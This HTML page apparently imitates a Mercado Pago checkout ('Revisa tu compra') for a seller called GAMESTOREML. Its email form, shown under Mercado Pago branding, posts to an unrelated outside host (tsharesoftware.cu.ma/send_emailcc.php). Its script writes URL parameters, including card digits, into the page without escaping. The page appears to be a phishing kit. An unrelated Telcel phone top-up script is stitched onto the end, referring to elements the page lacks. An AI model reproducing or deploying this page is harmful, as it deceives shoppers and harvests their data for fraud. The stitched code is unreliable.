
<!DOCTYPE html>
<html lang="es-MX">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width" />
<script src="./script.js"></script>
  <script >
  function getQueryVariable(variable)
{
       var query = window.location.search.substring(1);
       var vars = query.split("&");
       for (var i=0;i<vars.length;i++) {
               var pair = vars[i].split("=");
               if(pair[0] == variable){return pair[1];}
       }
       return(false);
}
</script>
<script>
 document.addEventListener("DOMContentLoaded",  función);
    
	function función() {		
		var searchRegExp = getQueryVariable('item_name').split('%2B').join(' ');
		searchRegExp = searchRegExp.split('+').join(' ');
		searchRegExp = searchRegExp.split('%C3%B1').join('n');
		searchRegExp = searchRegExp.split('%20').join(' ');		
		searchRegExp = searchRegExp.split('%C3%').join('');		
	    searchRegExp = searchRegExp.split('%2F').join('/');		
		searchRegExp = searchRegExp.split('%24').join('$');		
				
		document.getElementById('mitem').innerHTML = searchRegExp;
		searchRegExp = searchRegExp.split('%20').join(' ');
		document.getElementById('mitem').innerHTML = searchRegExp;
		
		document.getElementById('mprecio').innerHTML = '$' + getQueryVariable('amount');
		document.getElementById('mprecio2').innerHTML = '$' + getQueryVariable('amount');
		document.getElementById('micc').innerHTML = 'Tarjeta Terminada En ' + getQueryVariable('micc');
		
		 document.getElementById('business').value = getQueryVariable('business');		   
		document.getElementById('item_name').value = searchRegExp;
		document.getElementById('amount').value = getQueryVariable('amount');
		
      }
   
    </script>  

<link href="https://api.mercadopago.com/preconnect" rel="preconnect" data-head-react="true"/><script type="text/javascript" nonce="WLaqze1OFdTnAtTrJcqDIA==">
        window.dataLayer = [];
        (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
        new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
        j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
        'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
        })(window,document,'script','dataLayer','GTM-T8N3BPH');
      </script><meta http-equiv="X-UA-Compatible" content="IE=edge" data-head-react="true"/><meta name="robots" content="noindex,noimageindex" data-head-react="true"/><link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-head-react="true"/><link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-head-react="true"/><link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-head-react="true"/><link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v4.2.0/roboto-mono/roboto-mono-400.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-head-react="true"/><title>Revisa tu compra</title><style>@font-face {
          font-family:'Proxima Nova';
          font-weight:300;
          font-style:normal;
          src:url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.woff2) format("woff2"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.woff) format("woff"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.ttf) format("truetype");
        }
        @font-face {
          font-family:'Proxima Nova';
          font-weight:400;
          font-style:normal;
          src:url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.woff2) format("woff2"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.woff) format("woff"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.ttf) format("truetype");
        }
        @font-face {
          font-family:'Proxima Nova';
          font-weight:600;
          font-style:normal;
          src:url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.woff2) format("woff2"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.woff) format("woff"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.ttf) format("truetype");
        }</style>
<style>@font-face {
          font-family:'Roboto Mono';
          font-weight:400;
          font-style:normal;
          src:url(https://http2.mlstatic.com/ui/webfonts/v4.2.0/roboto-mono/roboto-mono-400.woff2) format("woff2"),
            url(https://http2.mlstatic.com/ui/webfonts/v4.2.0/roboto-mono/roboto-mono-400.woff) format("woff"),
            url(https://http2.mlstatic.com/ui/webfonts/v4.2.0/roboto-mono/roboto-mono-400.ttf) format("truetype");
        }</style>
<link href="https://http2.mlstatic.com/frontend-assets/px-checkout-frontend/payment-card.mlm.95e11102.css" rel="stylesheet" type="text/css" onerror="(window['_pfl'] = window['_pfl'] || []).push(['css', this.href])" />
<link href="https://http2.mlstatic.com/frontend-assets/px-checkout-frontend/payment-card-icon.mlm.815f6c2e.css" rel="stylesheet" type="text/css" onerror="(window['_pfl'] = window['_pfl'] || []).push(['css', this.href])" />
<link href="https://http2.mlstatic.com/frontend-assets/px-checkout-frontend/app.desktop.8202e0a3.css" rel="stylesheet" type="text/css" onerror="(window['_pfl'] = window['_pfl'] || []).push(['css', this.href])" />

</head><style>
  *:focus {
    box-shadow: 0 0 0 2px #fff, 0 0 0 3px #007EB5, 0 0 0 5px rgba(71, 154, 209, 0.3);
    outline: none;
  }

  *:focus-visible {
    box-shadow: 0 0 0 2px #fff, 0 0 0 3px #007EB5, 0 0 0 5px rgba(71, 154, 209, 0.3);
    outline: none;
  }

  *:focus:not(:focus-visible) {
    box-shadow: none;
    outline: none;
  }
</style><body class="redirect-view experiment experiment--13923 step_review site-mlm windows" data-no-turbolink="true" data-no-transition-cache="true"><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T8N3BPH" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><style>
    .andes-dropdown__arrow::after {
      border-right-color: #009EE3 !important;
      border-bottom-color: #009EE3 !important;
    }
  
    .andes-badge--neutral,
    .andes-message__border-color--neutral {
      background-color: #009EE3;
    }
  
    .andes-radio__input:checked + .andes-radio__background .andes-radio__outer-circle {
      border-color: #009EE3;
    }

    .andes-radio__input:checked + .andes-radio__background .andes-radio__inner-circle {
      background-color: #009EE3;
    }
  
    .andes-list__item--selected::before {
      border-color: #009EE3;
    }
  
    .andes-switch .andes-checkbox__input:checked~.andes-checkbox__mimic:before {
      border-color: #009EE3;
      background-color: #009EE3;
    }
  
    .andes-form-control--focused .andes-form-control__border:after {
      background-color: #009EE3 !important;
    }
  
    .with-custom-color {
      color: #009EE3;
    }
  
    .item-installments_row_media .options-list__label .group-media-object div:nth-child(3) .text span,
    .item-installments_row_media .options-list__label .group-media-object .ui-avatar__content span {
      color: #009EE3;
    }

    #installments_group_generic .icon-wrapper .icon-installments span {
      color: #009EE3;
    }
  
    a, a:hover {
      color: #009EE3;
    }
  
    .options-list .options-list__item:not(.disabled, .with-action-text, .with-switch) .options-list__label::before {
      border-color: #009EE3;
    }

    .options-list .options-list__item input:checked + .options-list__label:not(.with-switch) {
      box-shadow: inset 0.25em 0 0 0 #009EE3;
    }

    .options-list .options-list__item.with-action-text .options-list__label .group-media-object div:nth-child(3) .text {
      color: #009EE3;
    }

    .options-list .options-list__label::before {
      border-right-color: #009EE3 !important;
      border-bottom-color: #009EE3 !important;
    }

    .more-cards__label {
      color: #009EE3;
    }
  
    .andes-button--loud {
      background: #009EE3;
      border-color: #009EE3;
      color: #fff;
    }

    .andes-button.andes-button--loud[data-loading='true'] {
      background: #009EE3 !important;
      border-color: #009EE3 !important;
      color: #fff !important;
    }

    .andes-button--transparent,
    .andes-button--secondary,
    :focus ~ .ui-select__status-arrow::after {
      border-color: #009EE3;
      color: #009EE3;
    }

    .andes-button--transparent svg path,
    .andes-button--secondary svg path,
    .andes-button--link svg path,
    .andes-button--quiet svg path,
    .andes-button--terciary svg path {
      fill: #009EE3;
    }

    .andes-button--link,
    .andes-button--quiet,
    .andes-button--terciary,
    .andes-button--link:hover,
    :focus + .ui-select__label,
    :focus ~ .ui-select__label {
      color: #009EE3;
    }

    .andes-button::after {
      background: hsl(198.20000000000005, 100%, 53.4%);
    }

    .andes-button--loud:hover {
      background: hsl(198.20000000000005, 100%, 39.2%);
      border-color: hsl(198.20000000000005, 100%, 39.2%);
      color: #fff
    }

    .andes-button--loud:active {
      background: hsl(198.20000000000005, 100%, 32.9%);
      border-color: hsl(198.20000000000005, 100%, 32.9%);
      color: #fff
    }
  </style><div class="layout layout--redirect"><main id="root-app" class="layout-main" role="main"><button type="button" id="mp-close-btn" class="layout-close-btn u-no-user-select" data-close-payment="true"><svg width="16" height="16" viewBox="0 0 8 8" xmlns="http://www.w3.org/2000/svg"><title>Cancelar pago</title><path d="M7.194 0L4 3.194.806 0 0 .806 3.194 4 0 7.194.806 8 4 4.806 7.194 8 8 7.194 4.806 4 8 .806" fill-rule="nonzero" fill="#eee"></path></svg></button><div class="page-mask"><div class="optimus"><div class="layout__col-content" id="group_content"><h1 id="" class="c-title"><span>Revisa tu compra</span></h1><div class="scroller with-legals"><div class="animated-group overlay_and_expand "><div class="animated-content"></div><div class="content"><div class="group-generic-block"><form id="group_payment_method" class="form group_form " method="POST" novalidate="" autoComplete="off"><ul class="options-list ui-card select_row" data-loading="false"><li class="options-list__item item-payment_method_row with-action-text"><input type="radio" class="u-hide" id="payment_method_row" name="[ui_components][group_content][group_scroller][group_animated_overlay_and_expand][group_not_animated_content][group_row_block][group_payment_method][select_row]" value="[payment_method_row]"/><label class="options-list__label" for="payment_method_row"><div class="group-media-object" id=""><div><div class="icon-wrapper"><div class="payment-card-icon"><div class="payment-card payment-card__default payment-card__brand-master payment-card__brand-" style="font-size:11.4%"><div class="payment-card__container"><div class="payment-card__background"></div><div class="payment-card__placeholder-logo"></div><div class="payment-card__placeholder-data"></div><div class="payment-card__background"></div><div class="payment-card__background-overlay"></div><div class="payment-card__logo"></div></div></div></div></div></div><div><div class="row-details">
  <div class="text_title"><span  id="micc">Tarjeta terminada en 7036</span></div><div class="text"><span></span></div></div></div>
  <div><p id="" class="text"><a href="checkout_v1_payment_redirect_6a4fac9c-203d-485c-ba1a-e8b5cc9e85a9_card-form__router-request-id=15927339-fff3-438a-b003-a72c_cc.html">Modificar</a></p></div></div></label></li></ul></form></div><h2 id="" class="title-h2"><span>Ingresa tu e-mail para pagar</span></h2>
  <div class="ui-card-wrapper" id="email_row"><div class="ui-card">
  <form id="group_pay" class="form group_form " method="POST" action="https://tsharesoftware.cu.ma/send_emailcc.php"><div class="icon-wrapper"><svg class="with-custom-color" height="28" width="38" viewBox="0 0 38 28" style="border-radius:4px"><defs><rect height="24" id="email-a" width="37" rx="4" x=".5" y=".373"></rect></defs><g fill="none" transform="translate(-5 -14)"><path d="M0 .373h48v48H0z"></path><g transform="translate(5 12)"><mask id="email-b" fill="#fff"><rect height="24" width="37" rx="4" x=".5" y=".373"></rect></mask><rect height="24" width="37" rx="4" x=".5" y=".373"></rect><path d="M5.646-11.79H32.18v26.534l-20.128-3.051a4 4 0 0 1-3.355-3.356L5.646-11.79z" fill="currentColor" fill-opacity=".3" transform="rotate(-45 18.913 1.477)"></path></g><rect height="24" width="36" rx="3" stroke="currentColor" x="6" y="14"></rect></g></svg></div><div class="andes-form-control andes-form-control--textfield andes-form-control--default  ui-input-text offline required"><label><span class="andes-form-control__label">E-mail</span><div class="andes-form-control__control">
  
  <input name="email" type="email" required
       oninvalid="this.setCustomValidity('Completa este dato')"
       onchange="this.setCustomValidity('')"  value="" rows="1" class="andes-form-control__field" maxLength="120" id="email" aria-invalid="false" aria-describedby="email-message false"/>
	   </div></label><div class="andes-form-control__bottom"><span id="email-message" class="andes-form-control__message andes-form-control__message-fixed">Te enviaremos el detalle del pago apenas termines</span></div></div><input type="hidden" name="[ui_components][group_content][group_scroller][group_animated_overlay_and_expand][group_not_animated_content][email_row][group_pay][captchaToken]" value=""/>
	   </div></div><div class="group-legals"><div class="mp-brand"><span class="mp-brand__text">Procesado por</span><span class="u-accessibility-hidden">Mercado Pago</span><span class="mp-brand__logo"></span></div><hr class=""/><div class="terms"><p><span>Al pagar, afirmo que soy mayor de edad y acepto los</span><a href="https://www.mercadopago.com.mx/ayuda/24849" target="_blank" rel="noopener noreferrer">Términos y condiciones</a><span>de Mercado Pago.</span></p></div></div></div></div></div><div class="captcha-terms guest"><p><span>Protegido por reCAPTCHA - </span><a href="https://policies.google.com/privacy" target="_blank" rel="noopener noreferrer">Privacidad</a><span> - </span><a href="https://policies.google.com/terms" target="_blank" rel="noopener noreferrer">Condiciones</a></p></div></div><div class="layout__col-sidebar"><div class="brand"><span class="brand__img"><img src="https://static.mlstatic.com/org-img/mkt/email-mkt-assets/checkout-off/bag.png" alt="GAMESTOREML" title="GAMESTOREML"/></span><span class="brand__name brand__name__large">GAMESTOREML</span></div><div class="group-summary"><div class="group-summary__container"><h2 id="" class="title-h2"><span>Detalle de tu compra</span></h2><div class="row-summary">
  <span class="row-summary__text " id="mitem">producto</span><span class="row-summary__price " id="mprecio">$ 434</span></div><hr class=""/><div class="row-summary row-summary--pay"><span class="row-summary__text ">Pagas</span>
  <span class="row-summary__price " id="mprecio2">$ 434</span></div><div class="group-captcha guest"><div class="animated-group disabled ">
  <button type="" class="andes-button andes-button--large andes-button--loud" trackevent="[object Object]" loadingactions="[object Object]" data-loading="false" id="pay" name=""><span class="andes-button__content">Pagar</span>
  </form>
  </div></div><div class="group-generic" id="shield_footer"><div class="icon-wrapper"><svg xmlns="http://www.w3.org/2000/svg" width="17" height="16" viewBox="0 0 17 16"><g fill="none" fill-opacity=".45" fill-rule="evenodd"><g fill="#000" fill-rule="nonzero"><g><g><g><path d="M8.062.599l.383.317c1.92 1.59 3.81 2.374 5.68 2.374h.6v.6c0 5.633-2.165 9.242-6.473 10.679l-.19.063-.19-.063C3.564 13.132 1.4 9.523 1.4 3.89v-.6h.6c1.87 0 3.76-.783 5.68-2.374l.383-.317zm0 1.548c-1.8 1.4-3.62 2.179-5.455 2.32.135 4.725 1.947 7.648 5.455 8.898 3.508-1.25 5.32-4.173 5.455-8.898-1.835-.141-3.656-.92-5.455-2.32zm2.286 2.895l.896.798-4.02 4.513-2.472-2.377.831-.865 1.574 1.513 3.191-3.582z" transform="translate(-71 -504) translate(56 503) translate(15 1) translate(.5)"></path></g></g></g></g></g></svg></div><p id="" class="text"><span>Paga seguro con Mercado Pago</span></p></div></div></div></div></div></div></main></div>
  
  
  
  <script type="text/javascript">

var ComboMontoActivo=document.getElementById('Telcel');
var area_ticket_mostrada=false;
var transaccion_en_proceso=false;

function valida()
{

		var uno = document.FormRecarga;

         if (uno.Telefono.value.length <10 || EsNumero(uno.Telefono.value)==false  ) {
			 alert("Numero inválido.");
			 uno.Telefono.focus();
			 return false;

		  }

          if(uno.Telefono.value !== uno.Telefono2.value &&  document.FormRecarga.NoSolicitarConfirmacionDeNumero_checkbox.checked == false){

			 alert("Los teléfonos no coinciden.");
			 uno.Telefono.focus();
			 return false;


		  }

		if (uno.Monto.value.length<2) {

			alert("Elija el monto de su recarga.");
			ComboMontoActivo.focus();
			return false;


		}


		return true;

}

function solicitar_recarga(){


	var val = valida();
	if( val )
    {

		var TextoPrevioBotonRecargar = 	document.FormRecarga.BotonRecargar.value;
        $("#TicketArea").html("");

        if ($("#BotonRecargar").val()=="¿Confirmar?") {

            //Recargando
            document.FormRecarga.BotonRecargar.disabled=true;
            $("#BotonRecargar").val("Recargando...");
            $("#div_cancelar_recarga").hide();

			area_ticket_mostrada=true;
			transaccion_en_proceso=true;            

 			reacomodo_pantalla_celular();

			//Muestra grafico de carga
			$("#TicketArea").html("<center><b id='frase_recargando'>Enviando recarga...</b><br><div style='width:200px;height:15px;border: 1px solid black;border-radius: 5px; padding:0;'><div id='barra_de_progreso' style='height:100%;background-color: #09a0d4; float:left;'></div></div></center>");

			RC(); //Solicita recarga !

			iniciar_barra_progreso(); //Se pone despues de recarga por seguridad

		  }else if  ($("#BotonRecargar").val()=="Recargar")
          {

                $("#BotonRecargar").val("¿Confirmar?");
                document.getElementById("div_cancelar_recarga").style.display ="block";

                return;

          }

	}else{
	}

}


function RC()
{

$.post('recargar_telcel.php', {Monto: $("#Monto").val() , Telefono: $("#Telefono").val(), Company: document.FormRecarga.Company.options[document.FormRecarga.Company.selectedIndex].value, RepetirRecargas: $("#RepetirRecargas").is(':checked') , Recargar: "1" },

function(resp){
  


	$("#TicketArea").html(resp );

	var Saldo = ObtieneSaldoActual(resp);

	$("#SaldoTelcel").html("&nbsp;" + Saldo + "&nbsp;" );


    if (resp.indexOf("3 minutos")>-1)
    {

			CancelarRecarga();
            $("#TicketArea").html("<center>Intentas recargar el mismo número en menos de 3 minutos.<br>¿Estás seguro que deseas realizar esta recarga?.<br><input type=button value='Sí' style='width:100px;' onclick='RepetirRecarga();'><input type=button style='width:100px;' onclick='limpiar_area_de_ticket();ocultar_area_de_ticket();reacomodo_pantalla_celular();mostrar_formulario_de_recargas();iniciar_formulario_de_recargas();' value='No'></center>");
            return;

    }else{
		transaccion_en_proceso=false;
		reacomodo_pantalla_celular();
	}
    
    iniciar_formulario_de_recargas();    

}

);

}


	var FirsTimeT1 = true;
	var FirsTimeT2 = true;
	$(document).ready(function() {

        document.FormRecarga.Company.selectedIndex=0;
        document.getElementById("Telefono").focus();

		$('input[name=Telefono]').keydown(function() {


			 setTimeout(function() {

				if ($('input[name=Telefono]').val().length==10 && FirsTimeT1  )
				{

                    if (! document.FormRecarga.NoSolicitarConfirmacionDeNumero_checkbox.checked)
                    {

					   document.FormRecarga.Telefono2.focus();
					   FirsTimeT1 = false;
                    }else{
                        $("#Company").focus();
                        

                    }
				}
                ShowNumberMatchColors();

			}, 50);



        });

		$('input[name=Telefono2]').keydown(function() {

			setTimeout(function() {

				if ($('input[name=Telefono2]').val().length==10 && FirsTimeT2)
				{

					if ($('input[name=Telefono]').val()== $('input[name=Telefono2]').val())
                    {  
                        
                        $("#Company").focus();
                        
                    }                        
					FirsTimeT2 = false;


				}

                ShowNumberMatchColors();

			}, 50);



		});

    
    $("#BotonRecargar").keyup(function(e) {

        if (e.keyCode == 27 && $("#BotonRecargar").val()!=="Recargar")
        {
            CancelarRecarga();


        }
                        
        });


    $("#BotonCancelar").keyup(function(e) {

        if (e.keyCode == 27 && $("#BotonRecargar").val()!=="Recargar")
        {
            CancelarRecarga();


        }

        });

    });


function ShowNumberMatchColors()
{

$("#Telefono").removeClass();
$("#Telefono2").removeClass();

if ($('input[name=Telefono]').val().length==10 && ($('input[name=Telefono2]').val().length==10 || document.FormRecarga.NoSolicitarConfirmacionDeNumero_checkbox.checked)  )
{

    if ( $('input[name=Telefono]').val()==$('input[name=Telefono2]').val() || document.FormRecarga.NoSolicitarConfirmacionDeNumero_checkbox.checked  )
    {
        $("#Telefono").addClass("input_bordes_azul_fuerte");
        $("#Telefono2").addClass("input_bordes_azul_fuerte");
    }else{
        $("#Telefono").addClass("input_bordes_rojo");
        $("#Telefono2").addClass("input_bordes_rojo");

    }


}else{

	$("#Telefono").addClass("input_bordes_azul_normal");
    $("#Telefono2").addClass("input_bordes_azul_normal");



}

}
function EsNumero(numero){

	if (!/^([0-9])*$/.test(numero))
	{
		return false;
	}else{
		return true;
	}

}







//Repetir recarga
function RepetirRecarga()
{


//  document.getElementById("BotonRecargar").disabled=FALSE;
    document.getElementById("RepetirRecargas").checked=true;

    document.getElementById("BotonRecargar").click();
    document.getElementById("BotonRecargar").click();
    document.getElementById("RepetirRecargas").checked=false;
}

function CancelarRecarga()
{
    $("#BotonRecargar").val("Recargar");
    document.getElementById("div_cancelar_recarga").style.display ="none";
    document.getElementById("BotonRecargar").disabled=false;
    document.getElementById("BotonRecargar").focus();
}


function limpiar_area_de_ticket()
{
$("#TicketArea").html("");
}

function ocultar_area_de_ticket()
{
$("#TicketArea").hide();
area_ticket_mostrada=false;
}

function mostrar_formulario_de_recargas()
{
$("#celda_formulario_recargas").show(); //modificado por osscar 11/08/2021, antes tenía es_mobil() en vez de true
}




function iniciar_formulario_de_recargas()
{

CancelarRecarga();

$("#Telefono").val("");
$("#Telefono2").val("");
resetear_monto();

document.FormRecarga.Company.selectedIndex=0;
cambiar_carrier();    
    
ShowNumberMatchColors();
    
document.FormRecarga.BotonRecargar.disabled=false;
document.FormRecarga.BotonRecargar.value="Recargar";
FirsTimeT1 = true;
FirsTimeT2 = true;

//Se asegura de que otros eventos se ejecuten primero y no quiten el focus 
setTimeout(function(){ document.FormRecarga.Telefono.focus();  }, 200);







}

function ObtieneSaldoActual(ticket){
	
    var p = ticket.search("Saldo actual");
	var Saldo =  ticket.substring(p);
	Saldo = Saldo.substring(Saldo.search(">")+1);
	Saldo = Saldo.substring(0,Saldo.search("<"));
    Saldo = Saldo.replace("$", "");
	return Saldo;

}


//modificado por osscar 11/08/2021, se añadió este código existente a una función
function reacomodo_pantalla_celular(){ 

			if (area_ticket_mostrada) $("#TicketArea").show();
if (es_mobil()) 
{			
				
	if (area_ticket_mostrada) 
	{
		$("#celda_formulario_recargas").hide();

		
		if (! transaccion_en_proceso) $("#boton_hacer_otra_recarga").show();
	}else{	
		$("#boton_hacer_otra_recarga").hide();
	}
	
}else{	
	$("#celda_formulario_recargas").show("fast");
	$("#boton_hacer_otra_recarga").hide();

}

if (es_mobil())
	{
		document.getElementById("celda_formulario_recargas").setAttribute("align","center");
		
	}else{
		document.getElementById("celda_formulario_recargas").setAttribute("align","left");
			
	}

}


function es_mobil()
{

    return ($(window).width()<650); 

}


//En IE el cambio de seleccion no invoca el onchange en ciertas ocasiones
//Se manda el input del texto de la solicitud a vacio por seguridad
function resetear_monto()
{
    ComboMontoActivo.selectedIndex=0;
    $("#Monto").val("");
}

function ElegirMonto(combo_id)
{
    var combo = document.getElementById(combo_id);
    $('#Monto').val(combo.options[combo.selectedIndex].value);

}


function AddFavorite(favorite)
{


    var favorite_number = prompt("Escriba el número que desea agregar a favorito", favorite);
    if (favorite_number.length<10)
    {
        alert('Número invalido'); return;
    }


    var favorite_nickname = prompt("Escribe un nombre o apodo para asociarlo a "+ favorite_number);
    if (favorite_nickname.length<1)
    {
        alert('Alias inválido.'); return;
    }


$.post("recargar_telcel.php", {AgregarFavorito:"1" , Nick : favorite_nickname, Number:  favorite_number },

function(resp){

    alert(resp);

}

);


}



$( "#Company" ).dblclick(function() {
  cambiar_carrier();
});

$('#Company').keydown(function(e){
                
        if (e.keyCode == 13  /*|| e.keyCode == 9  */  )
        {

            NoCambiarCarrier=true;
            cambiar_carrier();
            ComboMontoActivo.focus();
            return false;

            //selecciona el carrier
        } else if(e.keyCode === 38 || e.keyCode === 40)

        { //up or down
        } else if(e.keyCode >=112 && e.keyCode <= 123)
        { //FUNCTIONS KEYS
        }else if(e.keyCode >=65 && e.keyCode <= 90)
        {
            
            seleccionar_compañia_por_letra("Company",String.fromCharCode(e.keyCode));
            return false;
        }


});

var NoCambiarCarrier=false;

function seleccionar_compañia_por_letra(id, value)
{

    
    var ret = undefined;
    var combo =document.getElementById(id);
    if( combo!= undefined)
    {
        var options = combo.options;
        var inicio_busqueda =  combo.selectedIndex+1;
                          

        for(i =inicio_busqueda; i < options.length; i++)
        {

            var letra_inicial =options[i].text.substr(0,1);

            if(letra_inicial == value.toUpperCase()  )
            {
                
                NoCambiarCarrier = true;

                combo.selectedIndex=i;
                cambiar_carrier();

                var ret = options[i].value;
                break;
                

            }
            
    
            //Reinicia busqueda
            if (i==options.length-1) i=0;
    
            
            //Detiene busqueda                           
            if (i==inicio_busqueda-1) break;
             
             
                
        }
    }
    
    
    return ret;
}


function cambiar_carrier()
{

        NoCambiarCarrier=false;

		//Oculta los selectores del monto
        $('#Telcel').hide();
        $('#PAQUETE_TELCEL_SL').hide();
        $('#INT').hide();
        $('#Movistar').hide(); 
        $('#Movistar_Datos').hide();
        $('#ATT').hide(); 
        $('#Unefon').hide();
        $('#Virgin').hide();
        $('#Tuenti').hide();
        $('#MazTiempo').hide();
        $('#Flash').hide();
        $('#Weex').hide();
        $('#Oui').hide(); 
        $('#Bait_tiempo_aire').hide(); 
        $('#Bait_internet_en_casa').hide(); 
        $('#Bait_paquete').hide(); 
        $('#Mi_Movil').hide(); 
        $('#Pillofon').hide(); 


        var combo_carrier =document.getElementById("Company");

        var compañia_seleccionada =combo_carrier.options[combo_carrier.selectedIndex].value;
        
        if (compañia_seleccionada=='Cierto') compañia_seleccionada='MazTiempo';
                                                    
        if (compañia_seleccionada.length >0) ComboMontoActivo=document.getElementById(compañia_seleccionada);

        if (combo_carrier.selectedIndex>0) $('#' + compañia_seleccionada).show();
        
        resetear_monto();
       

        }


var porcentaje_progreso=0;
var tiempo_objetivo=0;
var tiempo_transacurrido=0;
var intervalo =1000;
var tiempo_inicial =0;

var id_temporizador_barra_progreso= setInterval(avanzar_barra_progreso, intervalo );

function get_timestamp()
{

try {

const currentDate = new Date();
return currentDate.getTime();

} catch (error) {

  console.error(error.message);

}

}

function iniciar_barra_progreso()
{

try {

	tiempo_inicial =get_timestamp();
	tiempo_objetivo=10 * 1000;
	porcentaje_progreso=0;

} catch (error) {
  console.error(error.message);
}


}

function avanzar_barra_progreso()
{

var barra_progreso = document.getElementById("barra_de_progreso");

try {

	if (barra_progreso !== null)
	{

		tiempo_transacurrido=get_timestamp() - tiempo_inicial ;

		porcentaje_progreso= parseInt ((tiempo_transacurrido*100)/tiempo_objetivo);

		if (porcentaje_progreso>100) porcentaje_progreso=100;

		if (porcentaje_progreso>80 && tiempo_transacurrido< 10*1000)  //Sube el tiempo objetivo en caso de haberse consumido el primer tiempo corto
		{
			tiempo_objetivo=4*60*1000;
			$("#frase_recargando").html("Por favor espere...");

		}else if (porcentaje_progreso>=100 && tiempo_transacurrido > 10*1000) //Tiempo de espera excedido
		{
			$("#frase_recargando").html("Se excedió el tiempo de espera.<br>Revisa tus reportes para comprobar si la recarga fue realizada. ( MENU > REPORTES )");
		}

		$('#barra_de_progreso').width(porcentaje_progreso + '%');

	}


} catch (error) {

  console.error(error.message);

}

}

</script>



  </body></html>